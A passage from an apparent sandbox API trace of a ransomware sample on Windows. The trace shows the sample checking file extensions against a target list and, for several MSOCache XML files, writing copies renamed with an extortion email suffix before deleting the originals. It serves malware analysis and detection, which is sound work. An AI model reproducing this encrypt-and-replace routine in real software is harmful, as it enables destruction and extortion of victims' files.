Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.504] lstrlenW (lpString=".dbf") returned 4 [0034.504] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.504] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.504] lstrlenW (lpString=".1cd") returned 4 [0034.504] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.504] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.504] lstrlenW (lpString=".jpg") returned 4 [0034.504] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.504] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.504] lstrlenW (lpString="Setup.xml") returned 9 [0034.504] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.505] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=6241) returned 1 [0034.505] CloseHandle (hObject=0x178) returned 1 [0034.505] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.505] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.505] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.505] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.505] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.505] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.508] GetLastError () returned 0x0 [0034.508] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x1861, lpOverlapped=0x0) returned 1 [0034.509] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x1870, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x1870, lpOverlapped=0x0) returned 1 [0034.510] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.510] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.510] SetEndOfFile (hFile=0x17c) returned 1 [0034.510] CloseHandle (hObject=0x17c) returned 1 [0034.511] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.511] SetEndOfFile (hFile=0x178) returned 1 [0034.512] CloseHandle (hObject=0x178) returned 1 [0034.512] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.512] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.512] lstrlenW (lpString=".doc") returned 4 [0034.512] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.512] lstrlenW (lpString=".docx") returned 5 [0034.512] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.512] lstrlenW (lpString=".pdf") returned 4 [0034.512] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.513] lstrlenW (lpString=".xls") returned 4 [0034.513] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.513] lstrlenW (lpString=".xlsx") returned 5 [0034.513] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.513] lstrlenW (lpString=".ppt") returned 4 [0034.513] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.513] lstrlenW (lpString=".zip") returned 4 [0034.513] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.513] lstrlenW (lpString=".rar") returned 4 [0034.513] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.513] lstrlenW (lpString=".bz2") returned 4 [0034.513] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.513] lstrlenW (lpString=".7z") returned 3 [0034.513] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.513] lstrlenW (lpString=".dbf") returned 4 [0034.513] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.513] lstrlenW (lpString=".1cd") returned 4 [0034.513] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.513] lstrlenW (lpString=".jpg") returned 4 [0034.513] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.513] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.513] lstrlenW (lpString=".doc") returned 4 [0034.513] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.513] lstrlenW (lpString=".docx") returned 5 [0034.513] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.513] lstrlenW (lpString=".pdf") returned 4 [0034.514] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.514] lstrlenW (lpString=".xls") returned 4 [0034.514] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.514] lstrlenW (lpString=".xlsx") returned 5 [0034.514] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.514] lstrlenW (lpString=".ppt") returned 4 [0034.514] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.514] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.514] lstrlenW (lpString=".zip") returned 4 [0034.514] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.514] lstrlenW (lpString=".rar") returned 4 [0034.514] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.514] lstrlenW (lpString=".bz2") returned 4 [0034.514] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.514] lstrlenW (lpString=".7z") returned 3 [0034.514] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.514] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.514] lstrlenW (lpString=".dbf") returned 4 [0034.514] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.514] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.514] lstrlenW (lpString=".1cd") returned 4 [0034.514] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.514] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.514] lstrlenW (lpString=".jpg") returned 4 [0034.514] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.514] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.514] lstrlenW (lpString="VisioMUI.xml") returned 12 [0034.515] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.515] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=9503) returned 1 [0034.515] CloseHandle (hObject=0x178) returned 1 [0034.515] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 0x2020 [0034.515] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.515] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.515] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.515] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.515] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.516] GetLastError () returned 0x0 [0034.516] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x251f, lpOverlapped=0x0) returned 1 [0034.517] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x2520, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x2520, lpOverlapped=0x0) returned 1 [0034.518] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.518] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.518] SetEndOfFile (hFile=0x17c) returned 1 [0034.519] CloseHandle (hObject=0x17c) returned 1 [0034.519] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.519] SetEndOfFile (hFile=0x178) returned 1 [0034.520] CloseHandle (hObject=0x178) returned 1 [0034.520] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.520] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml")) returned 1 [0034.520] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.520] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.520] lstrlenW (lpString=".doc") returned 4 [0034.520] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.521] lstrlenW (lpString=".docx") returned 5 [0034.521] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.521] lstrlenW (lpString=".pdf") returned 4 [0034.521] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.521] lstrlenW (lpString=".xls") returned 4 [0034.521] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.521] lstrlenW (lpString=".xlsx") returned 5 [0034.521] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.521] lstrlenW (lpString=".ppt") returned 4 [0034.521] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.521] lstrlenW (lpString=".zip") returned 4 [0034.521] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.521] lstrlenW (lpString=".rar") returned 4 [0034.521] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.521] lstrlenW (lpString=".bz2") returned 4 [0034.521] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.521] lstrlenW (lpString=".7z") returned 3 [0034.521] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.521] lstrlenW (lpString=".dbf") returned 4 [0034.521] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.521] lstrlenW (lpString=".1cd") returned 4 [0034.521] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.521] lstrlenW (lpString=".jpg") returned 4 [0034.521] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.521] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.521] lstrlenW (lpString=".doc") returned 4 [0034.522] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.522] lstrlenW (lpString=".docx") returned 5 [0034.522] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.522] lstrlenW (lpString=".pdf") returned 4 [0034.522] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.522] lstrlenW (lpString=".xls") returned 4 [0034.522] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.522] lstrlenW (lpString=".xlsx") returned 5 [0034.522] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.522] lstrlenW (lpString=".ppt") returned 4 [0034.522] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.522] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.522] lstrlenW (lpString=".zip") returned 4 [0034.522] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.522] lstrlenW (lpString=".rar") returned 4 [0034.522] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.522] lstrlenW (lpString=".bz2") returned 4 [0034.522] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.522] lstrlenW (lpString=".7z") returned 3 [0034.522] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.522] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.522] lstrlenW (lpString=".dbf") returned 4 [0034.522] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.522] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.522] lstrlenW (lpString=".1cd") returned 4 [0034.523] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.523] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 75 [0034.523] lstrlenW (lpString=".jpg") returned 4 [0034.523] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.523] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0034.523] lstrlenW (lpString="OneNoteMUI.xml") returned 14 [0034.523] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.524] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2baff1c | out: lpFileSize=0x2baff1c*=1606) returned 1 [0034.524] CloseHandle (hObject=0x178) returned 1 [0034.524] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 0x2020 [0034.524] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0034.524] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0034.524] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.524] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.524] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0034.525] GetLastError () returned 0x0 [0034.525] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x646, lpOverlapped=0x0) returned 1 [0034.549] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0x650, lpOverlapped=0x0) returned 1 [0034.550] ReadFile (in: hFile=0x178, lpBuffer=0x32c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bafed4, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesRead=0x2bafed4*=0x0, lpOverlapped=0x0) returned 1 [0034.550] WriteFile (in: hFile=0x17c, lpBuffer=0x32c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2bafc9c, lpOverlapped=0x0 | out: lpBuffer=0x32c0020*, lpNumberOfBytesWritten=0x2bafc9c*=0xf0, lpOverlapped=0x0) returned 1 [0034.551] SetEndOfFile (hFile=0x17c) returned 1 [0034.551] CloseHandle (hObject=0x17c) returned 1 [0034.551] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bafec8 | out: lpNewFilePointer=0x0) returned 1 [0034.551] SetEndOfFile (hFile=0x178) returned 1 [0034.552] CloseHandle (hObject=0x178) returned 1 [0034.552] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0034.553] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 1 [0034.553] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.553] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.553] lstrlenW (lpString=".doc") returned 4 [0034.553] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.553] lstrlenW (lpString=".docx") returned 5 [0034.553] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.553] lstrlenW (lpString=".pdf") returned 4 [0034.553] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.553] lstrlenW (lpString=".xls") returned 4 [0034.554] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.554] lstrlenW (lpString=".xlsx") returned 5 [0034.554] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.554] lstrlenW (lpString=".ppt") returned 4 [0034.554] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.554] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.554] lstrlenW (lpString=".zip") returned 4 [0034.554] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.554] lstrlenW (lpString=".rar") returned 4 [0034.554] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.554] lstrlenW (lpString=".bz2") returned 4 [0034.554] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.554] lstrlenW (lpString=".7z") returned 3 [0034.554] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.554] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.554] lstrlenW (lpString=".dbf") returned 4 [0034.554] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.554] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.554] lstrlenW (lpString=".1cd") returned 4 [0034.554] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.554] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.554] lstrlenW (lpString=".jpg") returned 4 [0034.554] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.554] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.554] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.554] lstrlenW (lpString=".doc") returned 4 [0034.554] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.554] lstrlenW (lpString=".docx") returned 5 [0034.554] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.554] lstrlenW (lpString=".pdf") returned 4 [0034.554] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.554] lstrlenW (lpString=".xls") returned 4 [0034.555] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.555] lstrlenW (lpString=".xlsx") returned 5 [0034.555] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.555] lstrlenW (lpString=".ppt") returned 4 [0034.555] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.555] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 77 [0034.555] lstrlenW (lpString=".zip") returned 4 [0034.555] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.555] lstrlenW (lpString=".rar") returned 4 [0034.555] 